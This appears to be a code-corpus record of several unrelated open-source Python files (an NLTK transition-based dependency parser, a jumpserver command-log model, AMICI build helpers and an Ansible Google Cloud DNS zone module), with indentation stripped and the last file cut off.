return ' '.join(str(featureID) + ':1.0' for featureID in sorted(unsorted_result))
def _is_projective(self, depgraph):
arc_list = []
for key in depgraph.nodes:
node = depgraph.nodes[key]
if 'head' in node:
childIdx = node['address']
parentIdx = node['head']
if parentIdx is not None:
arc_list.append((parentIdx, childIdx))
for (parentIdx, childIdx) in arc_list:
# Ensure that childIdx < parentIdx
if childIdx > parentIdx:
temp = childIdx
childIdx = parentIdx
parentIdx = temp
for k in range(childIdx + 1, parentIdx):
for m in range(len(depgraph.nodes)):
if (m < childIdx) or (m > parentIdx):
if (k, m) in arc_list:
return False
if (m, k) in arc_list:
return False
return True
def _write_to_file(self, key, binary_features, input_file):
"""
write the binary features to input file and update the transition dictionary
"""
self._transition.setdefault(key, len(self._transition) + 1)
self._match_transition[self._transition[key]] = key
input_str = str(self._transition[key]) + ' ' + binary_features + '\n'
input_file.write(input_str.encode('utf-8'))
def _create_training_examples_arc_std(self, depgraphs, input_file):
"""
Create the training example in the libsvm format and write it to the input_file.
Reference : Page 32, Chapter 3. Dependency Parsing by Sandra Kubler, Ryan McDonald and Joakim Nivre (2009)
"""
operation = Transition(self.ARC_STANDARD)
count_proj = 0
training_seq = []
for depgraph in depgraphs:
if not self._is_projective(depgraph):
continue
count_proj += 1
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
b0 = conf.buffer[0]
features = conf.extract_features()
binary_features = self._convert_to_binary_features(features)
if len(conf.stack) > 0:
s0 = conf.stack[len(conf.stack) - 1]
# Left-arc operation
rel = self._get_dep_relation(b0, s0, depgraph)
if rel is not None:
key = Transition.LEFT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.left_arc(conf, rel)
training_seq.append(key)
continue
# Right-arc operation
rel = self._get_dep_relation(s0, b0, depgraph)
if rel is not None:
precondition = True
# Get the max-index of buffer
maxID = conf._max_address
for w in range(maxID + 1):
if w != b0:
relw = self._get_dep_relation(b0, w, depgraph)
if relw is not None:
if (b0, relw, w) not in conf.arcs:
precondition = False
if precondition:
key = Transition.RIGHT_ARC + ':' + rel
self._write_to_file(
key,
binary_features,
input_file)
operation.right_arc(conf, rel)
training_seq.append(key)
continue
# Shift operation as the default
key = Transition.SHIFT
self._write_to_file(key, binary_features, input_file)
operation.shift(conf)
training_seq.append(key)
print(" Number of training examples : " + str(len(depgraphs)))
print(" Number of valid (projective) examples : " + str(count_proj))
return training_seq
def _create_training_examples_arc_eager(self, depgraphs, input_file):
"""
Create the training example in the libsvm format and write it to the input_file.
Reference : 'A Dynamic Oracle for Arc-Eager Dependency Parsing' by Yoav Goldberg and Joakim Nivre
"""
operation = Transition(self.ARC_EAGER)
countProj = 0
training_seq = []
for depgraph in depgraphs:
if not self._is_projective(depgraph):
continue
countProj += 1
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
b0 = conf.buffer[0]
features = conf.extract_features()
binary_features = self._convert_to_binary_features(features)
if len(conf.stack) > 0:
s0 = conf.stack[len(conf.stack) - 1]
# Left-arc operation
rel = self._get_dep_relation(b0, s0, depgraph)
if rel is not None:
key = Transition.LEFT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.left_arc(conf, rel)
training_seq.append(key)
continue
# Right-arc operation
rel = self._get_dep_relation(s0, b0, depgraph)
if rel is not None:
key = Transition.RIGHT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.right_arc(conf, rel)
training_seq.append(key)
continue
# reduce operation
flag = False
for k in range(s0):
if self._get_dep_relation(k, b0, depgraph) is not None:
flag = True
if self._get_dep_relation(b0, k, depgraph) is not None:
flag = True
if flag:
key = Transition.REDUCE
self._write_to_file(key, binary_features, input_file)
operation.reduce(conf)
training_seq.append(key)
continue
# Shift operation as the default
key = Transition.SHIFT
self._write_to_file(key, binary_features, input_file)
operation.shift(conf)
training_seq.append(key)
print(" Number of training examples : " + str(len(depgraphs)))
print(" Number of valid (projective) examples : " + str(countProj))
return training_seq
def train(self, depgraphs, modelfile):
"""
:param depgraphs : list of DependencyGraph as the training data
:type depgraphs : DependencyGraph
:param modelfile : file name to save the trained model
:type modelfile : str
"""
try:
input_file = tempfile.NamedTemporaryFile(
prefix='transition_parse.train',
dir=tempfile.gettempdir(),
delete=False)
if self._algorithm == self.ARC_STANDARD:
self._create_training_examples_arc_std(depgraphs, input_file)
else:
self._create_training_examples_arc_eager(depgraphs, input_file)
input_file.close()
# Using the temporary file to train the libsvm classifier
x_train, y_train = load_svmlight_file(input_file.name)
# The parameter is set according to the paper:
# Algorithms for Deterministic Incremental Dependency Parsing by Joakim Nivre
# Todo : because of probability = True => very slow due to
# cross-validation. Need to improve the speed here
model = svm.SVC(
kernel='poly',
degree=2,
coef0=0,
gamma=0.2,
C=0.5,
verbose=True,
probability=True)
model.fit(x_train, y_train)
# Save the model to file name (as pickle)
pickle.dump(model, open(modelfile, 'wb'))
finally:
remove(input_file.name)
def parse(self, depgraphs, modelFile):
"""
:param depgraphs: the list of test sentences; each sentence is represented as a dependency graph where the 'head' information is dummy
:type depgraphs: list(DependencyGraph)
:param modelfile: the model file
:type modelfile: str
:return: list (DependencyGraph) with the 'head' and 'rel' information
"""
result = []
# First load the model
model = pickle.load(open(modelFile, 'rb'))
operation = Transition(self._algorithm)
for depgraph in depgraphs:
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
features = conf.extract_features()
col = []
row = []
data = []
for feature in features:
if feature in self._dictionary:
col.append(self._dictionary[feature])
row.append(0)
data.append(1.0)
np_col = array(sorted(col)) # NB : index must be sorted
np_row = array(row)
np_data = array(data)
x_test = sparse.csr_matrix((np_data, (np_row, np_col)), shape=(1, len(self._dictionary)))
# It's best to use the decision function as follows BUT it's not supported yet for sparse SVM
# Using the decision function to build the votes array
#dec_func = model.decision_function(x_test)[0]
#votes = {}
#k = 0
# for i in range(len(model.classes_)):
# for j in range(i+1, len(model.classes_)):
# #if dec_func[k] > 0:
# votes.setdefault(i,0)
# votes[i] +=1
# else:
# votes.setdefault(j,0)
# votes[j] +=1
# k +=1
# Sort votes according to the values
#sorted_votes = sorted(votes.items(), key=itemgetter(1), reverse=True)
# We will use predict_proba instead of decision_function
prob_dict = {}
pred_prob = model.predict_proba(x_test)[0]
for i in range(len(pred_prob)):
prob_dict[i] = pred_prob[i]
sorted_Prob = sorted(
prob_dict.items(),
key=itemgetter(1),
reverse=True)
# Note that SHIFT is always a valid operation
for (y_pred_idx, confidence) in sorted_Prob:
#y_pred = model.predict(x_test)[0]
# From the prediction match to the operation
y_pred = model.classes_[y_pred_idx]
if y_pred in self._match_transition:
strTransition = self._match_transition[y_pred]
baseTransition = strTransition.split(":")[0]
if baseTransition == Transition.LEFT_ARC:
if operation.left_arc(conf, strTransition.split(":")[1]) != -1:
break
elif baseTransition == Transition.RIGHT_ARC:
if operation.right_arc(conf, strTransition.split(":")[1]) != -1:
break
elif baseTransition == Transition.REDUCE:
if operation.reduce(conf) != -1:
break
elif baseTransition == Transition.SHIFT:
if operation.shift(conf) != -1:
break
else:
raise ValueError("The predicted transition is not recognized, expected errors")
# Finish with operations build the dependency graph from Conf.arcs
new_depgraph = deepcopy(depgraph)
for key in new_depgraph.nodes:
node = new_depgraph.nodes[key]
node['rel'] = ''
# With the default, all the token depend on the Root
node['head'] = 0
for (head, rel, child) in conf.arcs:
c_node = new_depgraph.nodes[child]
c_node['head'] = head
c_node['rel'] = rel
result.append(new_depgraph)
return result
def demo():
"""
>>> from nltk.parse import DependencyGraph, DependencyEvaluator
>>> from nltk.parse.transitionparser import TransitionParser, Configuration, Transition
>>> gold_sent = DependencyGraph(\"""
... Economic JJ 2 ATT
... news NN 3 SBJ
... has VBD 0 ROOT
... little JJ 5 ATT
... effect NN 3 OBJ
... on IN 5 ATT
... financial JJ 8 ATT
... markets NNS 6 PC
... . . 3 PU
... \""")
>>> conf = Configuration(gold_sent)
###################### Check the Initial Feature ########################
>>> print(', '.join(conf.extract_features()))
STK_0_POS_TOP, BUF_0_FORM_Economic, BUF_0_LEMMA_Economic, BUF_0_POS_JJ, BUF_1_FORM_news, BUF_1_POS_NN, BUF_2_POS_VBD, BUF_3_POS_JJ
###################### Check The Transition #######################
Check the Initialized Configuration
>>> print(conf)
Stack : [0] Buffer : [1, 2, 3, 4, 5, 6, 7, 8, 9] Arcs : []
A. Do some transition checks for ARC-STANDARD
>>> operation = Transition('arc-standard')
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
>>> operation.shift(conf)
>>> operation.left_arc(conf,"SBJ")
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
Middle Configuration and Features Check
>>> print(conf)
Stack : [0, 3, 5, 6] Buffer : [8, 9] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (5, 'ATT', 4), (8, 'ATT', 7)]
>>> print(', '.join(conf.extract_features()))
STK_0_FORM_on, STK_0_LEMMA_on, STK_0_POS_IN, STK_1_POS_NN, BUF_0_FORM_markets, BUF_0_LEMMA_markets, BUF_0_POS_NNS, BUF_1_FORM_., BUF_1_POS_., BUF_0_LDEP_ATT
>>> operation.right_arc(conf, "PC")
>>> operation.right_arc(conf, "ATT")
>>> operation.right_arc(conf, "OBJ")
>>> operation.shift(conf)
>>> operation.right_arc(conf, "PU")
>>> operation.right_arc(conf, "ROOT")
>>> operation.shift(conf)
Terminated Configuration Check
>>> print(conf)
Stack : [0] Buffer : [] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (5, 'ATT', 4), (8, 'ATT', 7), (6, 'PC', 8), (5, 'ATT', 6), (3, 'OBJ', 5), (3, 'PU', 9), (0, 'ROOT', 3)]
B. Do some transition checks for ARC-EAGER
>>> conf = Configuration(gold_sent)
>>> operation = Transition('arc-eager')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'SBJ')
>>> operation.right_arc(conf,'ROOT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.right_arc(conf,'OBJ')
>>> operation.right_arc(conf,'ATT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.right_arc(conf,'PC')
>>> operation.reduce(conf)
>>> operation.reduce(conf)
>>> operation.reduce(conf)
>>> operation.right_arc(conf,'PU')
>>> print(conf)
Stack : [0, 3, 9] Buffer : [] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (0, 'ROOT', 3), (5, 'ATT', 4), (3, 'OBJ', 5), (5, 'ATT', 6), (8, 'ATT', 7), (6, 'PC', 8), (3, 'PU', 9)]
###################### Check The Training Function #######################
A. Check the ARC-STANDARD training
>>> import tempfile
>>> import os
>>> input_file = tempfile.NamedTemporaryFile(prefix='transition_parse.train', dir=tempfile.gettempdir(), delete=False)
>>> parser_std = TransitionParser('arc-standard')
>>> print(', '.join(parser_std._create_training_examples_arc_std([gold_sent], input_file)))
Number of training examples : 1
Number of valid (projective) examples : 1
SHIFT, LEFTARC:ATT, SHIFT, LEFTARC:SBJ, SHIFT, SHIFT, LEFTARC:ATT, SHIFT, SHIFT, SHIFT, LEFTARC:ATT, RIGHTARC:PC, RIGHTARC:ATT, RIGHTARC:OBJ, SHIFT, RIGHTARC:PU, RIGHTARC:ROOT, SHIFT
>>> parser_std.train([gold_sent],'temp.arcstd.model')
Number of training examples : 1
Number of valid (projective) examples : 1
...
>>> remove(input_file.name)
B. Check the ARC-EAGER training
>>> input_file = tempfile.NamedTemporaryFile(prefix='transition_parse.train', dir=tempfile.gettempdir(),delete=False)
>>> parser_eager = TransitionParser('arc-eager')
>>> print(', '.join(parser_eager._create_training_examples_arc_eager([gold_sent], input_file)))
Number of training examples : 1
Number of valid (projective) examples : 1
SHIFT, LEFTARC:ATT, SHIFT, LEFTARC:SBJ, RIGHTARC:ROOT, SHIFT, LEFTARC:ATT, RIGHTARC:OBJ, RIGHTARC:ATT, SHIFT, LEFTARC:ATT, RIGHTARC:PC, REDUCE, REDUCE, REDUCE, RIGHTARC:PU
>>> parser_eager.train([gold_sent],'temp.arceager.model')
Number of training examples : 1
Number of valid (projective) examples : 1
...
>>> remove(input_file.name)
###################### Check The Parsing Function ########################
A. Check the ARC-STANDARD parser
>>> result = parser_std.parse([gold_sent], 'temp.arcstd.model')
>>> de = DependencyEvaluator(result, [gold_sent])
>>> de.eval() >= (0, 0)
True
B. Check the ARC-EAGER parser
>>> result = parser_eager.parse([gold_sent], 'temp.arceager.model')
>>> de = DependencyEvaluator(result, [gold_sent])
>>> de.eval() >= (0, 0)
True
Note that the result is very poor because there is only one training example.
"""
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
|
mit
|
zsjohny/jumpserver
|
apps/terminal/backends/command/models.py
|
1
|
1763
|
# -*- coding: utf-8 -*-
#
import uuid
from django.db import models
from django.utils.translation import ugettext_lazy as _
from orgs.mixins.models import OrgModelMixin
class AbstractSessionCommand(OrgModelMixin):
RISK_LEVEL_ORDINARY = 0
RISK_LEVEL_DANGEROUS = 5
RISK_LEVEL_CHOICES = (
(RISK_LEVEL_ORDINARY, _('Ordinary')),
(RISK_LEVEL_DANGEROUS, _('Dangerous')),
)
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
user = models.CharField(max_length=64, db_index=True, verbose_name=_("User"))
asset = models.CharField(max_length=128, db_index=True, verbose_name=_("Asset"))
system_user = models.CharField(max_length=64, db_index=True, verbose_name=_("System user"))
input = models.CharField(max_length=128, db_index=True, verbose_name=_("Input"))
output = models.CharField(max_length=1024, blank=True, verbose_name=_("Output"))
session = models.CharField(max_length=36, db_index=True, verbose_name=_("Session"))
risk_level = models.SmallIntegerField(default=RISK_LEVEL_ORDINARY, choices=RISK_LEVEL_CHOICES, db_index=True, verbose_name=_("Risk level"))
timestamp = models.IntegerField(db_index=True)
class Meta:
abstract = True
@classmethod
def from_dict(cls, d):
self = cls()
for k, v in d.items():
setattr(self, k, v)
return self
@classmethod
def from_multi_dict(cls, l):
commands = []
for d in l:
command = cls.from_dict(d)
commands.append(command)
return commands
def to_dict(self):
d = {}
for field in self._meta.fields:
d[field.name] = getattr(self, field.name)
return d
def __str__(self):
return self.input
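# A minimal round-trip sketch (assumes a concrete subclass named Command in a
# configured Django app; the field values below are purely illustrative):
#
#   cmd = Command.from_dict({
#       'user': 'admin', 'asset': 'web-01', 'system_user': 'root',
#       'input': 'ls -al', 'output': '', 'session': str(uuid.uuid4()),
#       'risk_level': Command.RISK_LEVEL_ORDINARY, 'timestamp': 1590000000,
#   })
#   assert cmd.to_dict()['input'] == 'ls -al'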
|
gpl-2.0
|
FFroehlich/AMICI
|
python/amici/setuptools.py
|
1
|
9201
|
"""
setuptools
----------
Helper functions for AMICI core and module package preparation
"""
import os
import sys
import shlex
import subprocess
import shutil
from distutils import log
from .swig import find_swig, get_swig_version
try:
import pkgconfig # optional
# pkgconfig python module might be installed without pkg-config binary
# being available
pkgconfig.exists('somePackageName')
except (ModuleNotFoundError, EnvironmentError):
pkgconfig = None
from typing import Dict, List, Union, Tuple, Any
PackageInfo = Dict[str, List[Union[str, Tuple[str, Any]]]]
def get_blas_config() -> PackageInfo:
"""
Find CBLAS-compatible BLAS
:return:
blas related package information
"""
blaspkgcfg = {'include_dirs': [],
'library_dirs': [],
'libraries': [],
'define_macros': [],
'extra_compile_args': [],
'extra_link_args': []
}
# Check environment variables
if 'BLAS_CFLAGS' in os.environ:
blaspkgcfg['extra_compile_args'].extend(
shlex.split(os.environ['BLAS_CFLAGS'])
)
if 'BLAS_LIBS' in os.environ:
blaspkgcfg['extra_link_args'].extend(
shlex.split(os.environ['BLAS_LIBS'])
)
if 'BLAS_CFLAGS' in os.environ or 'BLAS_LIBS' in os.environ:
# If options have been provided by the user, we don't try to detect
# anything by ourselves
return blaspkgcfg
# Try environment modules
# MKL
if 'MKLROOT' in os.environ:
if 'MKL_INC' in os.environ:
blaspkgcfg['extra_compile_args'].extend(
shlex.split(os.environ['MKL_INC'])
)
if 'MKL_LIB' in os.environ:
blaspkgcfg['extra_link_args'].extend(
shlex.split(os.environ['MKL_LIB'])
)
blaspkgcfg['define_macros'].append(('AMICI_BLAS_MKL', None), )
return blaspkgcfg
# Try pkgconfig
if pkgconfig:
for blas_name in ['cblas', 'openblas']:
if pkgconfig.exists(blas_name):
blaspkgcfg = pkgconfig.parse(blas_name)
blaspkgcfg['extra_compile_args'] = [
pkgconfig.cflags(blas_name)
]
blaspkgcfg['extra_link_args'] = [
pkgconfig.libs(blas_name)
]
return blaspkgcfg
# If none of the previous worked, fall back to libcblas in default paths
blaspkgcfg['libraries'] = ['cblas']
return blaspkgcfg
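# Sketch of how the returned package info could be wired into a setuptools
# Extension (illustrative only; the extension name and source file below are
# hypothetical and not part of AMICI):
#
#   from setuptools import Extension
#   blas = get_blas_config()
#   ext = Extension('amici._example', sources=['amici/example.cpp'],
#                   include_dirs=blas['include_dirs'],
#                   library_dirs=blas['library_dirs'],
#                   libraries=blas['libraries'],
#                   define_macros=blas['define_macros'],
#                   extra_compile_args=blas['extra_compile_args'],
#                   extra_link_args=blas['extra_link_args'])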
def get_hdf5_config() -> PackageInfo:
"""
Find HDF5 include dir and libs
:return:
hdf5 related package information
"""
h5pkgcfg = {'include_dirs': [],
'library_dirs': [],
'libraries': [],
'define_macros': []
}
hdf5_include_dir_found = False
hdf5_library_dir_found = False
# try for hdf5 in standard locations
hdf5_include_dir_hints = [
'/usr/include/hdf5/serial',
'/usr/local/include',
'/usr/include', # travis ubuntu xenial, centos
'/usr/local/Cellar/hdf5/1.10.2_1/include' # travis macOS
]
hdf5_library_dir_hints = [
'/usr/lib/x86_64-linux-gnu/', # travis ubuntu xenial
'/usr/lib/x86_64-linux-gnu/hdf5/serial',
'/usr/local/lib',
'/usr/lib64/', # CentOS
'/usr/local/Cellar/hdf5/1.10.2_1/lib' # travis macOS
]
# special treatment for conda environments
# as the conda library dir is provided first, we should also check for
# conda header files first
if 'CONDA_DIR' in os.environ:
hdf5_include_dir_hints.insert(
0, os.path.join(os.environ['CONDA_DIR'], 'include'))
hdf5_library_dir_hints.insert(
0, os.path.join(os.environ['CONDA_DIR'], 'lib'))
# Check for Environment Modules variables
if 'HDF5_BASE' in os.environ:
hdf5_include_dir_hints.insert(
0, os.path.join(os.environ['HDF5_BASE'], 'include'))
hdf5_library_dir_hints.insert(
0, os.path.join(os.environ['HDF5_BASE'], 'lib'))
for hdf5_include_dir_hint in hdf5_include_dir_hints:
hdf5_include_dir_found = os.path.isfile(
os.path.join(hdf5_include_dir_hint, 'hdf5.h'))
if hdf5_include_dir_found:
log.info('hdf5.h found in %s' % hdf5_include_dir_hint)
h5pkgcfg['include_dirs'] = [hdf5_include_dir_hint]
break
for hdf5_library_dir_hint in hdf5_library_dir_hints:
# check for static or shared library
for lib_filename in ['libhdf5.a', 'libhdf5.so']:
hdf5_library_dir_found = os.path.isfile(
os.path.join(hdf5_library_dir_hint, lib_filename))
if hdf5_library_dir_found:
log.info(f'{lib_filename} found in {hdf5_library_dir_hint}')
h5pkgcfg['library_dirs'] = [hdf5_library_dir_hint]
break
if hdf5_library_dir_found:
# break to not override hdf5_library_dir_found
break
h5pkgcfg['found'] = hdf5_include_dir_found and hdf5_library_dir_found
if h5pkgcfg['found']:
return h5pkgcfg
if pkgconfig:
try:
h5pkgcfg = pkgconfig.parse('hdf5')
except pkgconfig.PackageNotFoundError:
pass
# NOTE: Cannot use pkgconfig.exists('hdf5'), since this is true
# although no libraries or include dirs are available
h5pkgcfg['found'] = 'include_dirs' in h5pkgcfg \
and h5pkgcfg['include_dirs'] and \
'library_dirs' in h5pkgcfg \
and h5pkgcfg['library_dirs']
return h5pkgcfg
def add_coverage_flags_if_required(cxx_flags: List[str],
linker_flags: List[str]) -> None:
"""
Add compiler and linker flags if gcov coverage requested
:param cxx_flags:
list of existing cxx flags
:param linker_flags:
list of existing linker flags
"""
if 'ENABLE_GCOV_COVERAGE' in os.environ and \
os.environ['ENABLE_GCOV_COVERAGE'].upper() == 'TRUE':
log.info("ENABLE_GCOV_COVERAGE was set to TRUE."
" Building AMICI with coverage symbols.")
cxx_flags.extend(['-g', '-O0', '--coverage'])
linker_flags.extend(['--coverage', '-g'])
def add_debug_flags_if_required(cxx_flags: List[str],
linker_flags: List[str]) -> None:
"""
Add compiler and linker debug flags if requested
Arguments:
:param cxx_flags:
list of existing cxx flags
:param linker_flags:
list of existing linker flags
"""
if 'ENABLE_AMICI_DEBUGGING' in os.environ \
and os.environ['ENABLE_AMICI_DEBUGGING'] == 'TRUE':
log.info("ENABLE_AMICI_DEBUGGING was set to TRUE."
" Building AMICI with debug symbols.")
cxx_flags.extend(['-g', '-O0'])
linker_flags.extend(['-g'])
def generate_swig_interface_files(with_hdf5: bool = None) -> None:
"""
Compile the swig python interface to amici
"""
swig_outdir = os.path.join(os.path.abspath(os.getcwd()), "amici")
swig_exe = find_swig()
swig_version = get_swig_version(swig_exe)
swig_args = [
'-c++',
'-python',
'-py3',
'-threads',
f'-Iamici{os.sep}swig',
f'-Iamici{os.sep}include',
]
log.info(f"Found SWIG version {swig_version}")
# Are HDF5 includes available to generate the wrapper?
if with_hdf5 is None:
with_hdf5 = get_hdf5_config()['found']
if not with_hdf5:
swig_args.append('-DAMICI_SWIG_WITHOUT_HDF5')
# Do we have -doxygen?
if swig_version >= (4, 0, 0):
swig_args.append('-doxygen')
swig_cmd = [swig_exe,
*swig_args,
'-outdir', swig_outdir,
'-o', os.path.join("amici", "amici_wrap.cxx"),
os.path.join("amici", "swig", "amici.i")]
log.info(f"Running SWIG: {' '.join(swig_cmd)}")
sp = subprocess.run(swig_cmd, stdout=subprocess.PIPE,
stderr=sys.stdout.buffer)
if not sp.returncode == 0:
raise AssertionError('Swigging AMICI failed:\n'
+ sp.stdout.decode('utf-8'))
def add_openmp_flags(cxx_flags: List, ldflags: List) -> None:
"""Add OpenMP flags to lists for compiler/linker flags (in-place)"""
# Enable OpenMP support for Linux / OSX:
if sys.platform == 'linux':
log.info("Adding OpenMP flags...")
cxx_flags.append("-fopenmp")
ldflags.append("-fopenmp")
elif sys.platform == 'darwin':
if os.path.exists('/usr/local/lib/libomp.a'):
log.info("Adding OpenMP flags...")
cxx_flags.extend(["-Xpreprocessor", "-fopenmp"])
ldflags.extend(["-Xpreprocessor", "-fopenmp", "-lomp"])
else:
log.info("Not adding OpenMP flags, because /usr/local/lib/libomp.a"
" does not exist. To enable, run `brew install libomp` "
"or add flags manually.")
|
bsd-2-clause
|
civisanalytics/ansible
|
lib/ansible/modules/cloud/google/gcdns_zone.py
|
25
|
12939
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 CallFire Inc.
#
# This file is part of Ansible.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: gcdns_zone
short_description: Creates or removes zones in Google Cloud DNS
description:
- Creates or removes managed zones in Google Cloud DNS.
version_added: "2.2"
author: "William Albert (@walbert947)"
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.19.0"
options:
state:
description:
- Whether the given zone should or should not be present.
required: false
choices: ["present", "absent"]
default: "present"
zone:
description:
- The DNS domain name of the zone.
- This is NOT the Google Cloud DNS zone ID (e.g., example-com). If
you attempt to specify a zone ID, this module will attempt to
create a TLD and will fail.
required: true
aliases: ['name']
description:
description:
- An arbitrary text string to use for the zone description.
required: false
default: ""
service_account_email:
description:
- The e-mail address for a service account with access to Google
Cloud DNS.
required: false
default: null
pem_file:
description:
- The path to the PEM file associated with the service account
email.
- This option is deprecated and may be removed in a future release.
Use I(credentials_file) instead.
required: false
default: null
credentials_file:
description:
- The path to the JSON file associated with the service account
email.
required: false
default: null
project_id:
description:
- The Google Cloud Platform project ID to use.
required: false
default: null
notes:
- See also M(gcdns_record).
- Zones that are newly created must still be set up with a domain registrar
before they can be used.
'''
EXAMPLES = '''
# Basic zone creation example.
- name: Create a basic zone with the minimum number of parameters.
gcdns_zone: zone=example.com
# Zone removal example.
- name: Remove a zone.
gcdns_zone: zone=example.com state=absent
# Zone creation with description
- name: Creating a zone with a description
gcdns_zone: zone=example.com description="This is an awesome zone"
'''
RETURN = '''
description:
description: The zone's description
returned: success
type: string
sample: This is an awesome zone
state:
description: Whether the zone is present or absent
returned: success
type: string
sample: present
zone:
description: The zone's DNS name
returned: success
type: string
sample: example.com.
'''
################################################################################
# Imports
################################################################################
from distutils.version import LooseVersion
try:
from libcloud import __version__ as LIBCLOUD_VERSION
from libcloud.common.google import InvalidRequestError
from libcloud.common.google import ResourceExistsError
from libcloud.common.google import ResourceNotFoundError
from libcloud.dns.types import Provider
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
################################################################################
# Constants
################################################################################
# Apache libcloud 0.19.0 was the first to contain the non-beta Google Cloud DNS
# v1 API. Earlier versions contained the beta v1 API, which has since been
# deprecated and decommissioned.
MINIMUM_LIBCLOUD_VERSION = '0.19.0'
# The libcloud Google Cloud DNS provider.
PROVIDER = Provider.GOOGLE
# The URL used to verify ownership of a zone in Google Cloud DNS.
ZONE_VERIFICATION_URL = 'https://www.google.com/webmasters/verification/'
################################################################################
# Functions
################################################################################
def create_zone(module, gcdns, zone):
"""Creates a new Google Cloud DNS zone."""
description = module.params['description']
extra = dict(description = description)
zone_name = module.params['zone']
# Google Cloud DNS wants the trailing dot on the domain name.
if zone_name[-1] != '.':
zone_name = zone_name + '.'
# If we got a zone back, then the domain exists.
if zone is not None:
return False
# The zone doesn't exist yet.
try:
if not module.check_mode:
gcdns.create_zone(domain=zone_name, extra=extra)
return True
except ResourceExistsError:
# The zone already exists. We checked for this already, so either
# Google is lying, or someone was a ninja and created the zone
# within milliseconds of us checking for its existence. In any case,
# the zone has already been created, so we have nothing more to do.
return False
except InvalidRequestError as error:
if error.code == 'invalid':
# The zone name or a parameter might be completely invalid. This is
# typically caused by an illegal DNS name (e.g. foo..com).
module.fail_json(
msg = "zone name is not a valid DNS name: %s" % zone_name,
changed = False
)
elif error.code == 'managedZoneDnsNameNotAvailable':
# Google Cloud DNS will refuse to create zones with certain domain
# names, such as TLDs, ccTLDs, or special domain names such as
# example.com.
module.fail_json(
msg = "zone name is reserved or already in use: %s" % zone_name,
changed = False
)
elif error.code == 'verifyManagedZoneDnsNameOwnership':
# This domain name needs to be verified before Google will create
# it. This occurs when a user attempts to create a zone which shares
# a domain name with a zone hosted elsewhere in Google Cloud DNS.
module.fail_json(
msg = "ownership of zone %s needs to be verified at %s" % (zone_name, ZONE_VERIFICATION_URL),
changed = False
)
else:
# The error is something else that we don't know how to handle,
# so we'll just re-raise the exception.
raise
def remove_zone(module, gcdns, zone):
"""Removes an existing Google Cloud DNS zone."""
# If there's no zone, then we're obviously done.
if zone is None:
return False
# An empty zone will have two resource records:
# 1. An NS record with a list of authoritative name servers
# 2. An SOA record
# If any additional resource records are present, Google Cloud DNS will
# refuse to remove the zone.
if len(zone.list_records()) > 2:
module.fail_json(
msg = "zone is not empty and cannot be removed: %s" % zone.domain,
changed = False
)
try:
if not module.check_mode:
gcdns.delete_zone(zone)
return True
except ResourceNotFoundError:
# When we performed our check, the zone existed. It may have been
# deleted by something else. It's gone, so whatever.
return False
except InvalidRequestError as error:
if error.code == 'containerNotEmpty':
# When we performed our check, the zone existed and was empty. In
# the milliseconds between the check and the removal command,
# records were added to the zone.
module.fail_json(
msg = "zone is not empty and cannot be removed: %s" % zone.domain,
changed = False
)
else:
# The error is something else that we don't know how to handle,
# so we'll just re-raise the exception.
raise
def _get_zone(gcdns, zone_name):
"""Gets the zone object for a given domain name."""
# To create a zone, we need to supply a zone name. However, to delete a
# zone, we need to supply a zone ID. Zone ID's are often based on zone
# names, but that's not guaranteed, so we'll iterate through the list of
# zones to see if we can find a matching name.
available_zones = gcdns.iterate_zones()
found_zone = None
for zone in available_zones:
if zone.domain == zone_name:
found_zone = zone
break
return found_zone
def _sanity_check(module):
"""Run module sanity checks."""
zone_name = module.params['zone']
# Apache libcloud needs to be installed and at least the minimum version.
if not HAS_LIBCLOUD:
module.fail_json(
msg = 'This module requires Apache libcloud %s or greater' % MINIMUM_LIBCLOUD_VERSION,
changed = False
)
elif LooseVersion(LIBCLOUD_VERSION) < MINIMUM_LIBCLOUD_VERSION:
module.fail_json(
msg = 'This module requires Apache libcloud %s or greater' % MINIMUM_LIBCLOUD_VERSION,
changed = False
)
# Google Cloud DNS does not support the creation of TLDs.
if '.' not in zone_name or len([label for label in zone_name.split('.') if label]) == 1:
module.fail_json(
msg = 'cannot create top-level domain: %s' % zone_name,
changed = False
)
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = AnsibleModule(
argument_spec = dict(
state = dict(default='present', choices=['present', 'absent'], type='str'),
zone = dict(required=True, aliases=['name'], type='str'),
description = dict(default='', type='str'),
service_account_email = dict(type='str'),
pem_file = dict(type='path'),
credentials_file = dict(type='path'),
project_id = dict(type='str')
),
supports_check_mode = True
)
_sanity_check(module)
zone_name = module.params['zone']
state = module.params['state']
# Google Cloud DNS wants the trailing dot on the domain name.
